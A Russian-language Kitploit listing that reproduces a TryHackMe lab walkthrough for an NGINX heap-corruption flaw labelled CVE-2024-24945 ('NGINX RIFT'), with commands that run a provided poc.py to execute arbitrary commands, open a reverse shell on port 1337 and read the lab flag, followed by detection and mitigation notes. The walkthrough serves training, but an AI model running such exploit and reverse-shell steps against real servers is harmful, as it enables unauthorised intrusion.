Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — Эта лабораторная работа демонстрирует эксплуатацию уязвимости CVE-2024-24945 — повреждения кучи, затрагивающего NGINX. Цель заключалась в понимании того, как повреждение памяти может привести к удалённому выполнению кода (RCE), и получении практического опыта в методах эксплуатации, обнаружения и смягчения последствий. | Kitploit
Инструменты/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Репозиторий
42 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Эта лабораторная работа демонстрирует эксплуатацию уязвимости CVE-2024-24945 — повреждения кучи, затрагивающего NGINX. Цель заключалась в понимании того, как повреждение памяти может привести к удалённому выполнению кода (RCE), и получении практического опыта в методах эксплуатации, обнаружения и смягчения последствий.

Поделиться

CVE-2024-24945-NGINX-RIFT---Прохождение лабораторной работы TryHackMe

Эта лабораторная работа демонстрирует эксплуатацию уязвимости CVE-2024-24945, уязвимости повреждения кучи, затрагивающей NGINX. Цель состояла в том, чтобы понять, как повреждение памяти может привести к удаленному выполнению кода (RCE) и получить практический опыт в методах эксплуатации, обнаружения и смягчения последствий.

Цели

. Проверить уязвимый сервис NGINX. . Выполнить произвольные команды с помощью предоставленной концепции (PoC). . Получить обратную оболочку на целевом контейнере. . Извлечь флаг задания. . Понять стратегии обнаружения и смягчения последствий.

Лабораторная среда

. Платформа: TryHackMe . Целевой сервис: NGINX RIFT . Контейнерная среда: Docker . Инструмент эксплуатации: poc.py . Метод доступа: VNC (Virtual Network Computing)

Методология

  1. Проверка сервиса

  2. Подтверждено, что уязвимый контейнер работает и доступен.

  3. root@kitploit:~
    sudo docker ps
    curl -s http://127.0.0.1:19321/api/users/42
    

backend ок

  1. Удаленное выполнение кода

Выполнил предоставленный PoC для проверки выполнения произвольных команд.

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

Проверка успешного выполнения:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

Вывод: hello from depthfirst

Доступ через обратную оболочку

Установить интерактивную оболочку на целевом контейнере.

root@kitploit:~
python3 poc.py --shell

Успешное подключение:

[] listening for reverse shell on port 1337... [] connected. $

  1. Извлечение флага

Получен флаг задания.

root@kitploit:~
cat /flag.txt

Флаг:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

Возможности обнаружения

Защитники могут выявить попытки эксплуатации через:

. Аварийные завершения рабочих процессов NGINX . События ошибки сегментации . Неожиданные исходящие сетевые соединения . Подозрительные процессы оболочки (/bin/sh,bash) . Несанкционированное создание файлов во временных каталогах

Стратегии смягчения последствий

. Обновиться до исправленной версии NGINX. . Применить принцип минимальных привилегий . . Ограничить ненужный исходящий сетевой трафик . Внедрить непрерывный мониторинг журналов. . Использовать средства безопасности контейнеров и мониторинг во время выполнения

Ключевые выводы

Эта лабораторная работа предоставила практический опыт в:

. Понимание уязвимостей повреждения кучи. . Эксплуатация недостатков удаленного выполнения кода. . Установление обратных оболочек. . Выполнение проверки после эксплуатации. . Распознавание индикаторов компрометации и методов смягчения последствий.

Отказ от ответственности

Это упражнение было выполнено в контролируемой лабораторной среде TryHackMe только в образовательных целях и для обучения кибербезопасности.

Author: [Benedict Ejepu Amaechi] Platform: TryHackMe Тема: CVE-2024-24945 9NGINX RIFT0 Эксплуатация и защита Дата завершения: июнь 2026

Скачать инструмент